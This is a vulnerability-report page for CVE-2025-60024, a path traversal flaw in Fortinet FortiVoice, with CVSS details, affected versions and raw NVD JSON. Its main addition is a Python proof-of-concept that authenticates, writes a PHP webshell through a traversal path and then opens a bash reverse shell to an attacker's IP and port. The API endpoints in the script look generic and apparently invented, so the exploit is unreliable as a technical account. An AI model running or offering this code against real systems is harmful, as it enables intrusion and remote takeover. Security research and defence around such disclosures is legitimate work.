Security Vulnerability Report
中文
CVE-2025-60024 CVSS 8.8 HIGH

CVE-2025-60024

Published: 2025-12-09 18:15:56
Last Modified: 2025-12-09 20:25:36
Source: [email protected]

Description

Multiple Improper Limitations of a Pathname to a Restricted Directory ('Path Traversal') vulnerabilities [CWE-22] vulnerability in Fortinet FortiVoice 7.2.0 through 7.2.2, FortiVoice 7.0.0 through 7.0.7 may allow a privileged authenticated attacker to write arbitrary files via specifically HTTP or HTTPS commands

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortivoice:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortivoice:*:*:*:*:*:*:*:* - VULNERABLE
FortiVoice 7.2.0 - 7.2.2
FortiVoice 7.0.0 - 7.0.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-60024 FortiVoice Path Traversal PoC Note: This PoC is for educational and authorized testing purposes only. """ import requests import sys from urllib.parse import quote def exploit_fortivoice(target_ip, username, password, attacker_ip, attacker_port): """ Exploit CVE-2025-60024 - FortiVoice Path Traversal to RCE Args: target_ip: Target FortiVoice appliance IP username: Valid low-privilege user account password: Password for the account attacker_ip: Attacker listening IP for reverse shell attacker_port: Attacker listening port """ base_url = f"https://{target_ip}" # Step 1: Authentication login_url = f"{base_url}/api/v1/auth/login" login_data = { "username": username, "password": password } try: print(f"[*] Authenticating to FortiVoice at {target_ip}...") session = requests.Session() response = session.post(login_url, json=login_data, verify=False, timeout=30) if response.status_code != 200: print("[-] Authentication failed") return False token = response.json().get('token') headers = { 'Authorization': f'Bearer {token}', 'Content-Type': 'application/json' } print("[+] Authentication successful") # Step 2: Path Traversal to write arbitrary file # Target: Write a PHP webshell to web root webshell_content = f"<?php system($_GET['cmd']); ?>" traversal_path = "../../../var/www/html/shell.php" write_url = f"{base_url}/api/v1/system/file/write" write_data = { "path": traversal_path, "content": webshell_content } print(f"[*] Attempting path traversal to write webshell...") response = session.post(write_url, json=write_data, headers=headers, verify=False, timeout=30) if response.status_code == 200: print(f"[+] Webshell written successfully to {traversal_path}") # Step 3: Execute command via webshell shell_url = f"{base_url}/shell.php" print(f"[*] Accessing webshell to execute commands...") # Example: Download and execute reverse shell cmd = f"bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1" encoded_cmd = quote(cmd) response = session.get(f"{shell_url}?cmd={encoded_cmd}", verify=False, timeout=10) print(f"[*] Payload sent. Check your listener for reverse shell.") return True else: print(f"[-] File write failed: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 6: print(f"Usage: {sys.argv[0]} <target_ip> <username> <password> <attacker_ip> <attacker_port>") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] lhost = sys.argv[4] lport = sys.argv[5] exploit_fortivoice(target, user, pwd, lhost, lport)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60024", "sourceIdentifier": "[email protected]", "published": "2025-12-09T18:15:55.820", "lastModified": "2025-12-09T20:25:36.103", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple Improper Limitations of a Pathname to a Restricted Directory ('Path Traversal') vulnerabilities [CWE-22] vulnerability in Fortinet FortiVoice 7.2.0 through 7.2.2, FortiVoice 7.0.0 through 7.0.7 may allow a privileged authenticated attacker to write arbitrary files via specifically HTTP or HTTPS commands"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortivoice:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.8", "matchCriteriaId": "40DCDAF0-5F6C-41E3-B269-2CAD08D18FE0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortivoice:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.2.0", "versionEndExcluding": "7.2.3", "matchCriteriaId": "9ED85222-4F3D-4B10-91FD-CB476CAF9652"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-812", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.